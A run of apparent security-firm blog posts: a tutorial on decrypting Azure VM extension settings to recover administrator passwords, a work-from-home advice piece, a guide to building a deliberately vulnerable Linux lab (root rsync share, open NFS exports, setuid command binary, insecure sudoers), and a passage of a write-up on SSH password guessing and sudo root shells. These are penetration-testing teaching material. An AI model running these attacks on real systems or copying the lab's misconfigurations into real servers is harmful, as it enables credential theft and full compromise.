Back

Decrypting Azure VM Extension Settings with Get-AzureVMExtensionSettings

TL;DR

If you’re a local admin on an Azure VM, run the Get-AzureVMExtensionSettings script from MicroBurst to decrypt VM extension settings and potentially view sensitive parameters, storage account keys and local Administrator username and password.

Overview

The Azure infrastructure needs a mechanism to communicate with and control virtual machines. All Azure Marketplace images have the Azure Virtual Machine Agent (VM Agent) installed for this purpose.  Azure pre-packages some executable tasks as VM Extensions. The VM Agent downloads the extensions from the Azure infrastructure, executes them, and sends back the results. The settings and configuration for each extension are saved to disk, and any potentially-sensitive information within the those settings is encrypted.

The newly added Get-AzureVMExtensionSettings PowerShell cmdlet in NetSPI’s MicroBurst repository attempts to decrypt and report all available configuration information saved from previously executed extensions on a VM. Depending on how VM extensions have been utilized on the VM, this configuration may contain sensitive command parameters, storage account keys, or even the Administrator username and password.

Background

The Azure Fabric Controller acts as the middleware between the actual data center hardware and the various Windows Azure services. It is responsible for data center resource allocation/provisioning and the health/lifecycle management of the services.

Within Azure VMs, the VM Agent “manages interactions between an Azure VM and the Azure Fabric Controller. The VM agent is responsible for many functional aspects of deploying and managing Azure VMs, including running VM extensions.” The extension packages are downloaded from the Fabric Controller “through the privileged channel on private IP 168.63.129.16.”

Extensions’ .settings Files

When the extension packages are downloaded, their necessary files are stored on the VM’s file system at:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\

For example, the CustomScriptExtension’s files would be saved to:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\

This directory stores binaries, deployment scripts, status logs and more. Most importantly, it also stores the configuration information.

The exact information required is different for each extension, but this configuration is stored in the same format for all extensions. The configuration information is stored as a JSON object at the following path:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\RuntimeSettings\<#>.settings

For example, the CustomScriptExtension would store its settings file at the following path:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\RuntimeSettings\0.settings

Analyzing Settings for Sensitive Information

Each extension’s .settings file has the following structure:

{
  "runtimeSettings": [
    {
      "handlerSettings": {
        "protectedSettingsCertThumbprint": "<Thumbprint of Certificate Used to Encrypt the ProtectedSettings>",
        "protectedSettings": "Base64-Encoded Encrypted Settings",
        "publicSettings": { <Plaintext JSON Object for non-sensitive settings > }
      }
    }
  ]
}

The settings are specific to each extension, but we are interested in viewing the contents of the “protectedSettings” where potentially sensitive information is stored.

The Get-AzureVMPluginSettings cmdlet retrieves this information through the following steps:

  1. Find all .settings files on the VM for each extension.
  2. Apply the following steps to each settings file:
    1. If the .settings file has a valid “protectedSettingsCertThumbprint” value, find the corresponding certificate on the VM.
    2. If the certificate is found and its private key is accessible, decrypt the “protectedSettings” value.
    3. Output the decrypted “protectedSettings” value along with the rest of the information in the .settings file.

This allows us to easily review the plaintext values of the “protectedSettings” if the cmdlet can identify the corresponding certificate.

Secondary Settings Location

The .settings files nested deeply within C:\Packages\Plugins\ are useful, but not always complete. For example, the VMAccess extension (which resets Administrator credentials on the VM) truncates its .settings file as part of its execution. Additionally, sometimes the “protectedSettingsCertThumbprint” value references a certificate which has already been rotated and is unavailable on the VM. In these instances, we can’t recover the sensitive configuration information in the “protectedSettings” value.

However, there is a workaround! It was discovered that the JSON contents of these .settings file are also copied into an XML file within a ZIP file at the following path:

C:\WindowsAzure\CollectGuestLogsTemp\<GUID>.zip\Config\WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml

The contents of this XML file are kept up to date with the current encryption certificate, being re-encrypted as necessary. This means that the certificate should always be available on the VM and ready to decrypt the “protectedSettings” value. Additionally, the settings in the XML file are not redacted. This means that we can decrypt the settings of the VMAccess extension which include the Administrator username and password. The only downside of this XML file is that it appears to only contain information about the latest execution of each extension. This is fine for the VMAccess extension (since we’re most interested in the latest username and password) but less helpful for the RunCommand extension (where we may want to see past executions as well).

Attack Scenario Setup

Let’s demonstrate the cmdlet’s usage by first acting as an Azure Admin performing some actions, and creating the vulnerable environment, on a VM through extensions (running a command and resetting the Administrator credentials) and then acting as an attacker using Get-AzureVMExtensionSettings to retrieve the sensitive information.

Executing scripts through the RunCommand extension

Let’s pretend we’re an Azure Administrator tasked with joining a VM to a domain using existing Administrator credentials. There are several ways to accomplish this, but a tantalizing easy approach would be to perform this through a PowerShell script using the RunCommand feature. Although it’s against best practices, the Administrator credentials could be passed as parameters to the script. We may believe we’re protected because the script parameters are encrypted and stored in “protectedSettings.”

Using the Azure Cloud Shell, that command could look like the following:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name <VMName> -g <ResourceGroup > --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"

Once the command is issued, the VM Agent on target VM would pull the RunCommand extension from the Azure Fabric Controller. It would create a .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings

The settings are also copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file in the ZIP file described earlier. The specified PowerShell script would be executed by the VM agent and the VM would join the domain.

Resetting Administrator Credentials through the VMAccess extension

Let’s pretend that we also need to reset the Administrator credentials for the VM. This can be done graphically through the Portal or through PowerShell. In either case, this functionality utilizes the VMAccess extension to accomplish the task on the VM. As the admin running the command, we simply provide a new username and password for the VM Administrator account. The VMAccess extension will update the Administrator credentials on the VM and create an empty .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.5\RuntimeSettings\0.settings

This empty file wouldn’t be useful for an attacker, but the non-redacted settings are copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file.

Running Get-AzureVMExtensionSettings as an attacker

Now let’s switch roles to the attacker. We’ll assume that we’ve obtained Administrator access to the VM (perhaps through having the Contributor role or compromising a privileged service) and that we can run PowerShell commands. To use the Get-AzureVMExtensionSettings cmdlet, we’ll first download and extract the latest copy of the MicroBurst repo.

PS C:\ > Invoke-WebRequest https://github.com/NetSPI/MicroBurst/archive/master.zip -OutFile C:\tmp\mb.zip
PS C:\> Expand-Archive C:\tmp\mb.zip -DestinationPath C:\tmp\

If we want the full MicroBurst functionality, we could import the top-level MicroBurst.psm1 module. In our case, we’ll only need to run the individual script so we’ll import it directly. Let’s import it, run it, and investigate the results.

PS C:\> Import-Module C:\tmp\MicroBurst-master\Misc\Get-AzureVMExtensionSettings.ps1
PS C:\ > Get-AzureVMExtensionSettings
FullFileName : C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings
ProtectedSettingsCertThumbprint : CFE7419...
ProtectedSettings : MIICUgYJKoZIhvc...
ProtectedSettingsDecrypted : {"parameters":[<span style="color: #ff0000;"><strong>{"name":"user","value":"admin"},{"name":"password","value":"secret-password"}</strong></span>]}
PublicSettings : {"script": …} 
…
FileName: C:\WindowsAzure\CollectGuestLogsTemp\491f155a-5a14-4fb2-8aad-08598b61f6c9.zip\Config\
                                  WireServerRoleExtensionsConfig_b4817d34-70d7-4e8f-bee6-6b8eea40aef7._MGITest.xml
ExtensionName: Microsoft.Compute.VMAccessAgent
ProtectedSettingsCertThumbprint : F67D19B6F4C1E1C1947AF9B4B08AFC9EAED9CBB2
ProtectedSettings: MIIB0AYJK…
ProtectedSettingsDecrypted: <strong><span style="color: #ff0000;">{"Password":"MySecretPassword!"}</span></strong>
PublicSettings: <strong><span style="color: #ff0000;">{"UserName":"MyAdministrator"}
</span></strong>

In the above output, we can see that Get-AzureVMExtensionSettings cmdlet returned decrypted parameters from the RunCommand extension’s 0.settings file and Administrator credentials from the VMAccess extension’s settings stored in the XML file within a ZIP.

With this information, we may be able to pivot further into the domain or Azure environment, spreading to other VMs, Storage Accounts, and more.

The cmdlet will return all available settings information from previously applied VM extensions, even if the script is unable to properly decrypt the protectedSettings field.

The cmdlet can also produce CSV results by piping the results into the standard Export-CSV cmdlet like so: Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv. The output results.csv will have one row for each extension processed.

Previous Research

In 2018, Guardicore published a blog and corresponding tool using this technique. Their exploit targeted a specific version of the VMAccess extension which can be used to reset Administrator credentials on a VM. As mentioned previously, recent updates to the VMAccess extension have mitigated this by clearing the contents of that .settings file after the extension has completed its task. The Get-AzureVMExtensionSettings provides a much broader scope by analyzing all extensions and including the secondary settings location which circumvents Microsoft’s mitigations.

Responsible Disclosure

The issues discussed in this post were reported to Microsoft Security Response Center (MSRC) on January 22, 2020 including steps and sample code to reproduce. The case numbers were VULN-015273 and VULN-015274. After understanding that the exploit requires Administrator privileges on the VM the cases were closed with the following comment:

Our team investigated the issue, and this does not meet the bar for servicing by MSRC, since this requires elevated privileges.
We have informed the team about this, but will not be tracking this. As such, we are closing this case.

 

Acknowledgements

A big thanks to Karl Fosaaen for the suggestion to dive into this functionality and support through the MSRC process.

Back

#WFH – Embracing the New Norm of Working From Home

Pandemics Happen: You Can’t Predict a Crisis

A worldwide pandemic broke out, and your employer is asking you to work from home instead of coming into the office. Well, you’re not alone. This is the situation that many people have found themselves in during this Covid-19 pandemic.

Although it may seem like no big deal at first, working from home daily for an extended period of time is vastly different than going into the office every day. For some, the line of work-life balance gets even more blurred than before.

The hurdles of working from home tend to amplify in our current situation when people are trying to work from home and have their children at home (instead of at school) all day too. People try to make light of the situation they’re in by posting some really funny posts on social media like the one from Jason White:

This is truly the new normal for all of us, and there’s no certainty as to how much longer this pandemic is going to force people to work from home.

Luckily for us, today we are extremely well connected via the Internet and leveraging cloud-based software solutions/Software-as-a-Service (SaaS), Virtual Private Networks (VPN), Virtual Desktops Infrastructure (VDI), etc., makes it easy for some organizations to enable their workforce to work effectively from home.

This pandemic is also the first time many of these organizations are actually executing their Business Disaster Recovery (BDR) and Business Continuity Plans (BCP). Businesses are quickly learning from the challenges since these plans are very different when they’re being documented theoretically versus when they’re being executed in a real-time crisis.

Getting Comfortable With “The New Norm”

Let’s face it, as humans since the beginning of time, we’ve always had to adapt to different challenges. This is no different. This might be the new normal for a while, until we figure out how to get this pandemic under control.

I’ve been very fortunate at various parts of my career to have the experience of working from home or starting a consulting practice from scratch in a new geographic region – where at the beginning, there’s no office to work out of.

Here are a few things that have worked well for me and allowed me to work effectively from home, and during a time of crisis like a pandemic, how not to feel isolated.

1. Create a Dedicated Space for Work

It’s important to create a separate area for you to dedicate to work. Ideally you want a space where you can close the door and seclude yourself for taking phone calls, conference calls, video conferences, or just shutting out any distractions when you need to get some work done.

This is important as you can create a virtual boundary for when you’re working and when you’re not. Force yourself to leave this space when you take breaks (whether it be to get some coffee, go for a walk, grab lunch, etc.). This allows you to mimic some of the social norms that you’d have while at the office – like taking a bathroom break, walking to the kitchen to grab a coffee or going out for lunch with your coworkers – where you end up leaving your actual workspace multiple times during the day to let your mind take a break from work.

2. Get Your Technology Set Up Properly

Ergonomics is important, but so is getting actual equipment and connectivity that will allow you to be most effective while working from home. There are plenty of resources online discussing how to set up your workspace with proper ergonomics that fit your needs. I would like to focus on the technology side of things, where certain equipment can make your life significantly less stressful when working from home.

First, invest in a strong and reliable Internet connection. High speed Internet has become really affordable, and most organizations that require their workforce to work from home will usually subsidize some (if not all) of your Internet bill. I recommend getting a reliable and fast connection – this will pay dividends in the long run as you have more and more video conference calls and can start using your VOIP setup if your organization has one.

Second, for making phone calls, if I’m at my desk, I typically use my VOIP setup that NetSPI provides all their employees through Microsoft Teams. I have a dedicated work number where people can reach me, and I use it to make calls from my desk (and even sometimes from my smartphone if I’m somewhere with a spotty cell network but I have a strong Wi-Fi connection).

Third, make sure you get a big monitor/display if you can. You’re going to be hunkered down in a small space working, forcing yourself to work on a small laptop screen ends up being very stressful, especially today when all of us are multi-tasking, having an extra monitor is extremely helpful in reducing the amount of back-and-forth between applications. If an extra monitor isn’t viable, for Mac users, you may be able to use your iPad as an extra screen with Sidecar and have an application or window that you use most regularly on there. This will make it so you don’t have to constantly be switching windows. If you cannot have a multiple screen setup, you can still leverage your operating systems features like “Spaces” on a Mac or “Virtual Desktops” on a Windows machine to have multiple screens set up for different purposes (e.g. one screen for things you’re actively working on and a second screen for all communications, like Instant Messaging and email).

Here’s a view of my work-setup at home:

Screens and their usage from left to right:

  • I use my iPad Pro as an extra screen with Sidecar to always have my email on display. I like using a stand (Lamicall tablet stand) for the iPad to help raise it a little closer to the height of the other screens.
  • The main monitor (Dell U3818DW) I use for things I’m actively working on – usually things like document creation, web browsing, news feeds, taking notes, etc. – this is basically my active workspace.
  • My MacBook Pro is on a stand to bring it to an eye-level height for me, and I am usually running my virtual machines to perform scanning work, or security testing as I research new things and try to learn and keep up with new technologies as they evolve in the security space.

You’ll also notice that I have a gel-pad for my wrist that spans my keyboard and my mouse. This is because I did in the past start experiencing aches in my wrists and was worried about getting Carpal Tunnel Syndrome – this has helped tremendously to relieve a lot of stress in my hands and shoulders as well.

I also invested in getting myself a nice webcam (Logitech C920S HD Pro), with a privacy shutter. Currently I work remotely from home – even outside of Covid-19 – so I try to make sure that on all conference calls I have my video turned on. I find that it encourages others to turn on their video too making the virtual meetings feel more intimate and also makes you feel more connected with others on your team. Make sure to try and place the camera close to eye-level and at an angle where it’s facing you directly, if possible. Here are some tips on how to kick your video conferencing game up a notch and look more professional during your video calls. As we get more connected globally, and business today happens across all borders and oceans, video conferencing is going to start being more and more prominent. It’s time we start mastering video conferencing.

Here are some home-office setups from some of our other NetSPI colleagues:

3. Embrace Your New “Co-Workers”

All of a sudden, you’re co-habituating and working with some “creatures” that you would normally be away from while at the office. This may be your children, parents, significant other, cat, dog, duck, gecko, etc.

You need to accept that you’ll be “co-working” together and potentially sharing and intruding on each other’s space from time to time. The sooner you accept it, the less friction you’ll have, and you can plan to share the space peacefully. Be grateful for the extra time that you might have with your family, children or your pets – they are definitely excited to have more time with you.

With family members, make sure you have some way to signal them if you’re in the middle of working on something or if on a conference call and need to avoid distractions. For me, when the door to my home office is closed, my pets and my family members know not to bother me. When the door is open, they are welcome to share space as long as they’re not being overbearing or too distracting.

Pets can also be very therapeutic, especially at a time when you’re physical distancing from everyone and may start feeling isolated. Accept them into your space. Let them sleep at your feet (or on your lap for that lap dog or lap cat). Pet them from time to time and let them know that you appreciate the way they naturally relieve your stress and give you a sense of companionship and support that all humans crave.

At NetSPI we have created a Slack channel called #pets_of_netspi where we all share pictures and videos of our new fuzzy (and some non-fuzzy) “co-workers” that help us get through our day. Here’s just a preview of some of our #pets_of_netspi rockstars:

4. Virtual Lunch and Coffee Video Conferences

Just like you don’t always talk to your coworkers in the office about work, you need to continue harboring both a professional and personal relationship with your colleagues. We discussed how video conferences have become more prominent – not only that, but Microsoft is making Teams available for everyone to help in the face of the Covid-19 pandemic. With technical solutions being at our disposal today, take advantage of this, and schedule virtual lunch meetings or coffee meetings with colleagues. Take a break from work and discuss non-work related topics like you normally would during lunch or coffee.

5. Maintain a Routine

Even though none of your colleagues or boss would know if you didn’t  brush your teeth, stay in your pajamas all day, or even shower for days, it doesn’t mean you should start getting lazy about your regular day to day activities. Make sure you still maintain a regular routine. Things like going to bed and waking up at a consistent time, making  your bed, making yourself a healthy breakfast, taking your dog for a morning walk, exercising, meditating, etc. are all important factors that will make you more effective at your work.

Taking some breaks and setting aside some personal time is always healthy. Pick up meditation or take a quick walk around the neighborhood, text or call your loved ones and check in on how they are doing in this moment of crisis.

Another thing you may want to consider is picking up a new skill or hobby. Now that you have all that extra time from not commuting back and forth from the office, you have no excuse. Always wanted to be able to pick up a guitar and play some sick tunes? Well, now is your chance to start learning and practicing. Want to complete your New Years’ resolution of losing those 15 extra pounds you gained over the holidays? Well, maybe now it’s time to start some workout programs that you can do at home. Maybe you always wanted to better yourself with more education? I’ve actually been spending time taking some free Ivy League courses online on topics that I’ve always been interested in delving into deeper.

6. Organize Virtual Social Events with Your Company or Team

Little things can make a big difference in a team’s morale and also help build camaraderie and a sense of togetherness. Organizing a virtual happy hour or just a video conference call to check-in with everyone and hang out helps reduce the feeling of isolation that everyone is facing from physical distancing.

Last Friday evening right at the end of business hours, we organized a virtual video happy hour event at NetSPI. It was wonderful to see everyone join in, with their favorite beverages in hand, and enthusiasm to see and connect with rest of the team. Some did the video conference from their deck in their backyard, some took it from their home office setup, and one even joined from their kid’s bedroom where he was assembling furniture for his kids. The most amount of excitement actually came when pet owners started showing off their pets to each other, and the pets got to greet their new friends during the video conference. There were various topics that were discussed (completely non-work related) as everyone was facing similar circumstances. People even shared ideas they had for activities they were going to attempt over the weekend while trying to practice social distancing.

7. Over-Communicate

You’re not going to get the opportunity to run into your boss or coworker in the hallway and mention all the cool things you’re working on or the amazing meeting you had with a client or the really amazing discovery you made while doing an assessment – so make sure you’re over communicating and keeping everyone looped in. Send regular status updates to your managers and your teams. As a manager make sure you communicate regularly with your team members to make sure they’re all on track and try to understand if they’re facing any challenges early and try to help sooner rather than later. Keeping your team and your management updated regularly is key to making sure everyone’s on the same page. If you have customers that you interface with regularly, at times like this, the need for regular communication with customers is even more important since your business probably depends heavily on the customers’ current state of business.

Putting It All Together

Remember, you’re not in this situation alone. This working from home situation is turning out to be the new normal. Create a separate workspace dedicated for working. Make sure you get the right technology or accessories to be efficient and effective at your job. Embrace the fact that you’re going to be sharing space and spending more time with your family and pets at home while you’re working. Maintain a routine and stay active both mentally and physically. Set aside time for virtual social activities over video conference. Lastly, make sure you over-communicate and keep everyone looped in on necessary updates.

Hopefully you find these tips helpful as you try to adjust and get acclimated to working from home. If you have comments or other tips that have worked well for you, we would love to hear from you. Share them with us via Twitter by tweeting to @NetSPI with #WorkFromHome.

Back

Linux Hacking Case Studies Part 5: Building a Vulnerable Linux Server

This blog will share how to configure your own Linux server with the vulnerabilities shown in the “Linux Hacking Case Studies” blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy!

Below are links to the first four blogs in the series:

Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you’ll be building which are based on this blog series.

# REMOTE VULNERABILITY LOCAL VULNERABILITY ESCALATION PATH
1 Excessive privileges configured on a Rsync Server Excessive privileges configured on a Rsync server.  Specifically, the server is configured to run as root. Create a new privileged user by adding lines to the shadow, passwd, groups, and sudoers files.
2 Excessive privileges configured on a NFS Export  Insecure setuid binary that allows arbitrary code execution as root. Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.
3 Weak password configured for phpMyAdmin Excessive privileges configured on a script that is executed by a root cron job.  Specifically, the script file is world writable. Write a command to the world writable script that starts a netcat listener.  When the root cron job executes the script the netcat listener will start as root. Then its possible to connect to the netcat listeners remotely to obtain root access.

Reverse shell alternatives here.

4 Weak password configured for SSH Insecure sudoers configurations that allows arbitrary code execution as root through sudo applications. Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root. Examples include sh, VI, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we’ll be building our vulnerable services on a standard Kali image.  If you don’t already have a Kali VM, you can download from their site website to get you setup.  Once your Kali VM is ready to go you’ll want to install some package that will be required for setting up the scenarios in the lab.  Make sure to sign as root, you’ll need those privilege to setup the lab.

Install Required Packages

apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap

Clear Firewall Restrictions

iptables --flush
ufw allow from any to any
ufw status

With that out of the way let’s dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync

In this section we’ll cover how to configure an insecure Rsync server.  Once you’re logged in as root execute the commands below.

Let’s start by creating the rsyncd.conf configuration file with the commands below:

echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf

Rsync

Next, let’s setup the rsync Service:

systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync

Verify the Configuration

rsync 127.0.0.1::
rsync 127.0.0.1::files

Rsync

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS

In this section we cover how to configure insecure NFS exports and an insecure setuid binary.  Once you’re logged in as root execute the commands below.

Configure NFS Exports

Create NFS Exports

echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports

Start NFS Server

systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server

Verify NFS Export

showmount -e 127.0.0.1

Nfs

Create Password Files for Discovery

echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt

Nfs

Enable password authentication through SSH.

sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c:

echo "#include <stdlib.h>" > /home/test/exec.c
echo "#include <stdio.h>" >> /home/test/exec.c
echo "#include <unistd.h>" >> /home/test/exec.c
echo "#include <string.h>" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo "int main(int argc, char *argv[]){" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("%s,%dn", "USER ID:",getuid());" >> /home/test/exec.c
echo " printf("%s,%dn", "EXEC ID:",geteuid());" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("Enter OS command:");" >> /home/test/exec.c
echo " char line[100];" >> /home/test/exec.c
echo " fgets(line,sizeof(line),stdin);" >> /home/test/exec.c
echo " line[strlen(line) - 1] = ''; " >> /home/test/exec.c
echo " char * s = line;" >> /home/test/exec.c
echo " char * command[5];" >> /home/test/exec.c
echo " int i = 0;" >> /home/test/exec.c
echo " while(s){" >> /home/test/exec.c
echo " command[i] = strsep(&s," ");" >> /home/test/exec.c
echo " i++;" >> /home/test/exec.c
echo " }" >> /home/test/exec.c
echo " command[i] = NULL;" >> /home/test/exec.c
echo " execvp(command[0],command);" >> /home/test/exec.c
echo "}" >> /home/test/exec.c

Compile exec.c:

gcc -o /home/test/exec exec.c
rm exec.c

Configure setuid on exec so that we can execute commands as root:

chmod 4755 exec

Nfs

Verify you can execute the exec binary as a least privilege user.

Nfs

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin

In this section we’ll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a script that’s world writable.  Once you’re logged in as root execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We’ll start by resetting the root password on the local MySQL instance.  MySQL should be installed by default in Kali, but if it’s not on your build you’ll have to install it first.

# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install PHPMyAdmin

Alrighty, time to install phpMyAdmin.

apt-get install phpmyadmin

Eventually you will be presented with a GUI. Follow the instructions below.

  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator’s password, which should be set to “password” to match the lab.

After the installation we still have a few things to do. Let’s create a soft link in the webroot to phpmyadmin.

ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin

Then, let’s restart the required services:

service apache2 restart
service mysql restart

Next, let’s add the admin user we’ll be guessing later.

mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit

Finally, configure excessive privileges in the webroot just for fun:

cd /var/www/
chown -R www-data *
chmod -R 777 *

Web it’s all done you should be able to verify the setup by logging into https://127.0.0.1/phymyadmin as the “admin” user with a password of “password”.

Php

Create a World Writable Script

Next up, let’s make a world writable script that will be executed by a cron job.

mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts

Create Root Cron Job
Now, let’s configure a root cron job to execute the script every minute.

echo "* * * * * /scripts/rootcron.sh" > mycron

You can then verify the cron job was added with the command below.

crontab -l

Cron

Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories
This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands.

Create Encrypted Password
The command below will allow you create create an encrypted password for generating test users. I originally found this guidance from https://askubuntu.com/questions/94060/run-adduser-non-interactively.

openssl passwd -crypt test

Next you can add new users using the generate password below.  This is not required, but handy for scripting out environments.

useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser

Create an Insecure Sudoers Configuration
The sudoers configuration below with allow vi, nmap, python, and sh to be executed as root by test and user1.

echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers

When its all done you can log in as the previously created test user to verify the sudo application are available:

Sudo

Wrap Up

In this blog we covered how to configure your own vulnerable Linux server, so you can learn in a safe environment.  Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new the security community.  Stay safe and hack responsibly!

Back

Linux Hacking Case Studies Part 4: Sudo Horror Stories

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk -F ' ' '{print $2} '> ssh.txt
cat ssh.txt

Dictionary Attacks against SSH Servers

Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn’t mean it’s not effective.  We see default and weak SSH passwords configured in at least a half of the environments we look at.

If you haven’t done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

In this scenario let’s assume we’re going to test for common user name and password combinations.  That means we’ll need a file containing a list of users and a file containing a list of passwords.  Kali ships with some good word lists that provide coverage for common user names and passwords.  Many can be found in the /usr/share/wordlists/.

Wordlists

While those can be handy, for this scenario we’re going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks for most management protocols.  Most of those modules use the protocol_login naming standard. Example: ssh_login . Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/password.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.

Guessedsshpassword

Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.

Sudo


Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, UnixPrivsEsc, etc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is configuration file in Linux that defines what commands can be run as what user.  It’s also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

Sudo
In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh
Sudo


Exploiting Sudo VI

VI is a text editor that’s installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configurations files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means, if you provided a user sudo access to VI, then you have effectively provided them with root access to your server.

